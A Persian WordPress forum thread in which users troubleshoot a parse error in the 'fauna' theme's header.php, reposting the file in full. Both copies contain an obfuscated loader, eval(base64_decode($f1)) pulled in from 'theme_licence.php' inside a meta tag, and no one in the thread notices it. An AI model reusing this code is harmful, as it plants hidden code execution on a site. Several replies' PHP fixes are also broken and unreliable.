• اطلاعیه ها

  • Saeed Fard

   آگهی استخدام برنامه نویس و پشتیبان وردپرس   13/12/95

   آگهی استخدام برنامه نویس و پشتیبان وردپرس
    
   2 نفر پشتیبان سایت وردپرسی
   ⁃ آشنا به برنامه نویسی قالب و پلاگین وردپرس 
   ⁃ توانایی راه اندازی سایت، قالب و افزونه های وردپرسی 
   ⁃ توانایی برنامه نویسی PHP در حد متوسط 
   ⁃ اطلاعات عمومی وب بالا 
   ⁃ توانایی پاسخگویی نوشتاری به سوالات انگلیسی با گرامر ساده 
   ⁃ آشنایی با HTML/CSS/jQuery 
   ⁃ دارای روحیه کار تیمی، خلاق، مسئولیت‌پذیر و پشتکار بالا ——— ۲ نفر برنامه نویس قالب وردپرس
   ⁃ تسلط به HTML/CSS/jQuery و Bootstrap
   ⁃ توانایی تبدیل HTML به قالب وردپرس
   ⁃ توانایی برنامه نویسی PHP و پلاگین نویسی وردپرس در حد متوسط
   ⁃ آشنایی به اصول سئو 
   ⁃ آشنایی با Git/subversion مزیت محسوب می‌شود.
   ⁃ دارای روحیه کار تیمی، خلاق، مسئولیت‌پذیر و پشتکار بالا ——— ۱ نفر طراح UI/UX
   ⁃ طراحی خلاقه وب سایت
   ⁃ طراحی با جدیدترین استایل‌های طراحی سایت
   ⁃ مسلط به تایپوگرافی انگلیسی و طراحی وب سایت انگلیسی
   ⁃ انتقاد پذیری و قبول بازخوردهای تیم و مشارکت با دیگر اعضاء تیم برای سرعت بخشیدن به فرایند انجام پروژه
   ⁃ آشنایی و درک HTML/CSS/jQuery
   ⁃ دارای روحیه کار تیمی، خلاق، مسئولیت‌پذیر و پشتکار بالا
   ⁃ امکان همکاری به صورت پروژه‌ای و دورکاری در این موقعیت شغلی فراهم است ——— مزایای کار در مجموعه گرودیا
   ⁃ تجربه ناب کار در سطح یک جهانی
   ⁃ محیط کار بسیار دوستانه و آرام
   ⁃ پرداخت های مناسب و سر وقت
   ⁃ کلاس های آموزشی داخلی به جهت بالا بردن دانایی و توانایی همه اعضا   از علاقه‌مندان و نیازمندان تقاضا می‌شود لطفا رزومه کاری خود را با قید موقعیت شغلی به ایمیل info@grodea.co ارسال نمایید.
  • Morteza

   سال 1396 خورشیدی مبارک   29/12/95

   سال 1396 خورشیدی مبارک
مرتضی نظری

مشکل در هیدر

6 پست در این موضوع قرار دارد

سلام

قصد دارم برای وبلاگ خودم یک قالب طراحی کنم... البته طراحی که نه میخوام یک قالب رو ویرایش کنم.... ولی تغییرات زیادی توش اعمال کنم...

یک قالب پیدا کردم که خیلی به طرح من نزدیکه اما اصلا اجرا نمیشه که بخوام ویرایشش هم کنم...

این ارور رو میده:

[b]Parse error[/b]: syntax error, unexpected end of file in [b]C:\Program Files\EasyPHP-12.1\www\wp1\wp-content\themes\fauna\header.php[/b] on line [b]112[/b]

محتوی هیدر هم اینه:

<?php load_theme_textdomain('fauna'); ?>
<?php include TEMPLATEPATH . "/functions-custom.php"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php if (function_exists('language_attributes')) { language_attributes(); } ?>>
<head profile="http://gmpg.org/xfn/1">
<title><?php bloginfo('name'); ?><?php if (is_home()) { ?><?php if (get_bloginfo('description') != "") { ?> | <? bloginfo('description'); } ?><?php } ?><?php if (is_category()) { ?> | <?php _e('Categories','fauna'); ?><?php } ?><?php wp_title('|'); ?><?php if (is_author()) { ?> | <?php _e('About Author','fauna'); ?><?php } ?><?php if (is_search()) { ?> | <?php printf(__('Search Results for: %s','fauna'), $s) ?><?php } ?><?php if (function_exists("is_tag")) { if (is_tag()) { _e(' | Tags | ','fauna'); single_tag_title(); } } ?></title>

<!-- Meta -->
<meta http-equiv="Content-Type" content="text/html; charset=<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('charset'); ?>" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="template" content="Fauna <?php if (function_exists('fauna_info')) { fauna_info('version'); } ?>" />

<!-- Feeds -->
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 2.0','fauna'); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('Comments RSS 2.0','fauna'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 0.92','fauna'); ?>" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> <?php _e('Atom 0.3','fauna'); ?>" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<?php if (get_option('fauna_comment') != '0') { comments_popup_script(); } ?>

<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="<?php bloginfo('stylesheet_url'); ?>" />
<link rel="stylesheet" type="text/css" media="screen" href="<?php fauna_info('style'); ?>" />
<link rel="stylesheet" type="text/css" media="print" href="<? bloginfo('stylesheet_directory'); ?>/meta/print.css" />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" media="screen" href="<? bloginfo('stylesheet_directory'); ?>/style-ieonly.css" />
<![endif]-->

<!-- Javascript -->
<script language="javascript" type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/meta/scripts.js"></script>

<style type="text/css">
<?php if (get_option('fauna_background') != '') { ?>
.bg {
background-image: url('<?php echo get_option('fauna_background'); ?>');
background-repeat: repeat;
}
<?php } ?>
<?php if (get_option('fauna_header') == 'fauna') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-fauna.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'flora') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-flora.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'frost') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-frost.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'no-header') { ?>
#header {
background-image: none;
height: 0;
margin-bottom: 0;
}
<?php } elseif (get_option('fauna_header') == 'url-header') { ?>
#header {
background-image: url('<?php echo get_option('fauna_headerurl') ?>');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } ?>
</style>
<?php wp_head(); ?>

</head>
<?php // Sections ?>
<?php if (is_home()) { ?>
<body class="bg" id="index">
<?php } else { ?>
<body class="bg">
<?php start_template(); ?>
<?php } ?>
<a name="top" id="top"></a>
<div id="wrapper"<?php if (get_option('fauna_sidebar') != 'right') { ?> class="left"<?php } ?>>
<div id="nav">
<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?> <?php _e('Home','fauna'); ?>"><?php bloginfo('name'); ?></a></h1>
<div id="menu">
<ul>
<?php if (get_option('fauna_tab') != '') { ?>
<li class="<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search()) { ?>current_page_item<?php } else { ?>page_item<?php } ?>"><a href="<?php echo get_settings('home'); ?>/" title="<?php fauna_info('tab'); ?>" accesskey="1"><?php fauna_info('tab'); ?></a></li>
<?php } ?>
<?php wp_list_pages('sort_column=menu_order&depth=1&title_li='); ?>
</ul>
</div>

<div id="searchbox">
<fieldset>
<legend><label for="s"><?php _e('Search','fauna'); ?></label></legend>
<form id="searchform" method="get" action="<?php bloginfo('url'); ?>">
<input name="s" type="text" class="inputbox" id="s" value="<?php _e('Search','fauna'); ?>" onfocus="this.value=''" onblur="if (this.value == '') { this.value = '<?php _e('Search','fauna'); ?>'; }" />
</form>
</fieldset>
</div>


</div>
<div id="header"></div>

<hr />

ممنون میشم که کمکم کنید.

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

اینو بزار ببین چی میشه

فک کنم مشکل از آخر کدت باشه . . . </ hr> دیگه چیه!؟


<?php load_theme_textdomain('fauna'); ?>
<?php include TEMPLATEPATH . "/functions-custom.php"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php if (function_exists('language_attributes')) { language_attributes(); } ?>>
<head profile="http://gmpg.org/xfn/1">
<title><?php bloginfo('name'); ?><?php if (is_home()) { ?><?php if (get_bloginfo('description') != "") { ?> | <? bloginfo('description'); } ?><?php } ?><?php if (is_category()) { ?> | <?php _e('Categories','fauna'); ?><?php } ?><?php wp_title('|'); ?><?php if (is_author()) { ?> | <?php _e('About Author','fauna'); ?><?php } ?><?php if (is_search()) { ?> | <?php printf(__('Search Results for: %s','fauna'), $s) ?><?php } ?><?php if (function_exists("is_tag")) { if (is_tag()) { _e(' | Tags | ','fauna'); single_tag_title(); } } ?></title>
<!-- Meta -->
<meta http-equiv="Content-Type" content="text/html; charset=<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('charset'); ?>" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="template" content="Fauna <?php if (function_exists('fauna_info')) { fauna_info('version'); } ?>" />
<!-- Feeds -->
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 2.0','fauna'); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('Comments RSS 2.0','fauna'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 0.92','fauna'); ?>" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> <?php _e('Atom 0.3','fauna'); ?>" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<?php if (get_option('fauna_comment') != '0') { comments_popup_script(); } ?>
<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="<?php bloginfo('stylesheet_url'); ?>" />
<link rel="stylesheet" type="text/css" media="screen" href="<?php fauna_info('style'); ?>" />
<link rel="stylesheet" type="text/css" media="print" href="<? bloginfo('stylesheet_directory'); ?>/meta/print.css" />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" media="screen" href="<? bloginfo('stylesheet_directory'); ?>/style-ieonly.css" />
<![endif]-->
<!-- Javascript -->
<script language="javascript" type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/meta/scripts.js"></script>
<style type="text/css">
<?php if (get_option('fauna_background') != '') { ?>
.bg {
background-image: url('<?php echo get_option('fauna_background'); ?>');
background-repeat: repeat;
}
<?php } ?>
<?php if (get_option('fauna_header') == 'fauna') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-fauna.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'flora') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-flora.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'frost') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-frost.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'no-header') { ?>
#header {
background-image: none;
height: 0;
margin-bottom: 0;
}
<?php } elseif (get_option('fauna_header') == 'url-header') { ?>
#header {
background-image: url('<?php echo get_option('fauna_headerurl') ?>');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } ?>
</style>
<?php wp_head(); ?>
</head>
<?php // Sections ?>
<?php if (is_home()) { ?>
<body class="bg" id="index">
<?php } else { ?>
<body class="bg">
<?php start_template(); ?>
<?php } ?>
<a name="top" id="top"></a>
<div id="wrapper"<?php if (get_option('fauna_sidebar') != 'right') { ?> class="left"<?php } ?>>
<div id="nav">
<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?> <?php _e('Home','fauna'); ?>"><?php bloginfo('name'); ?></a></h1>
<div id="menu">
<ul>
<?php if (get_option('fauna_tab') != '') { ?>
<li class="<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search()) { ?>current_page_item<?php } else { ?>page_item<?php } ?>"><a href="<?php echo get_settings('home'); ?>/" title="<?php fauna_info('tab'); ?>" accesskey="1"><?php fauna_info('tab'); ?></a></li>
<?php } ?>
<?php wp_list_pages('sort_column=menu_order&depth=1&title_li='); ?>
</ul>
</div>
<div id="searchbox">
<fieldset>
<legend><label for="s"><?php _e('Search','fauna'); ?></label></legend>
<form id="searchform" method="get" action="<?php bloginfo('url'); ?>">
<input name="s" type="text" class="inputbox" id="s" value="<?php _e('Search','fauna'); ?>" onfocus="this.value=''" onblur="if (this.value == '') { this.value = '<?php _e('Search','fauna'); ?>'; }" />
</form>
</fieldset>
</div>


</div>
<div id="header"></div>
</head>

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

سلام

ممنون بابت جوابتون

اتفاقا خط 112 هم میشه همون <hr /> منم تعجب کردم که این چیه!!!

مطمعنا head نیست.. چون چند خط بالاتر این خط بسته شده.. یک نکته ی دیگه هم هست: منوی سایت و تصویر هیدر رو که دیگه نمیزارن توی head که ;)

اصلا خود پوسته رو اینجا میزارم... خیلی ممنون میشم که کمکم کنید تا خوبش کنم

fauna.zip

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

hr در واقع برای قرار دادن یه خط افقی استفاده میشه

کد دومی رو که گذاشتم به جای <head> همون </hr> رو بزارید و ازش استفاده کنید باید مشکل حل شه چون این کد با نرم افزار ++notepad سیو شده و مشکل دیگه ای نداره

تا اونجایی که من میدونم ارور سینتکس به علت اشتباه در دستورات کد نویسی پیش میاد دیگه...

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

هر شرط در php باید به صورت


if()
{
}
else
{
};

هر کدوم از آکولادهای بسته شدن یا نقطه ویرگول آخر نباشه این ارور را دریافت می کنید که ظرهارا کد شما نقطه ویرگول ها را ندارد بگذارید تا آخر شب برایتان اصلاح می کنم

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

کل کد اصلاحش خیلی وقت گیره این برای بخش title کده با کد فعلی title مقایسه کنید متوجه تفاوت می شوید


<title>
<?php bloginfo('name');
if (is_home() && (get_bloginfo('description') != "")
{
bloginfo('description');
}
elseif (is_category()) {
echo 'Categories';
} elseif (is_author()) {
echo'About Author';
} elseif (is_search()) {
printf(__('Search Results for: %s','fauna'), $s);
} elseif (function_exists("is_tag") or (is_tag()) {
_e(' | Tags | ','fauna'); single_tag_title();
} else {
wp_title('|');}; ?>
</title>

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری